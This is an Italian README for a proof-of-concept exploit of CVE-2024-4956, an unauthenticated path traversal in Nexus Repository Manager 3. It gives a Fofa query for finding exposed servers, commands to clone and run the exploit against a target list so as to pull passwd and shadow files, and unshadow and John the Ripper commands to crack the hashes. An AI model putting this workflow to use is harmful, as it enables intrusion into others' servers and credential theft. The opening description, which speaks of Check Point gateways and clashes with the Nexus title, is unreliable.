
POC - CVE-2024–4956 - Nexus Repository Manager 3 Path Traversal non autenticato
Potenzialmente consente a un attaccante di leggere determinate informazioni sui Check Point Security Gateways una volta connessi a Internet e con le funzionalità Remote Access VPN o Mobile Access Software Blades abilitate. È disponibile una patch di sicurezza che mitiga questa vulnerabilità.
Leggi di più — CVE-2024-4956
Disclaimer: Questa Proof of Concept (POC) è creata esclusivamente a scopo educativo e di test etico. L'utilizzo di questo strumento per attaccare target senza previo consenso reciproco è illegale. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili per usi impropri o danni causati da questo programma.
Per trovare potenziali target, utilizza Fofa (simile a Shodan.io):
header="Server: Nexus/3.53.0-01 (OSS)"
Per prima cosa, clona il repository:
git clone https://github.com/verylazytech/CVE-2024-4956
Successivamente scegli il tuo target e aggiungilo al file list.txt in questo formato:
Esegui l'Exploit:
python3 CVE-2024-4956.py -l list.txt
L'output sono i file passwd e shadow trovati:

Ora, dopo aver trovato entrambi i file passwd e shadow, puoi provare a crackare gli hash con JohnTheRipper. Dopo aver eseguito l'exploit hai 2 file, passwd e shadow, quindi puoi unirli in un unico file e provare a crackarli (ho usato rockyou.txt ma può essere qualsiasi wordlist di password):
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt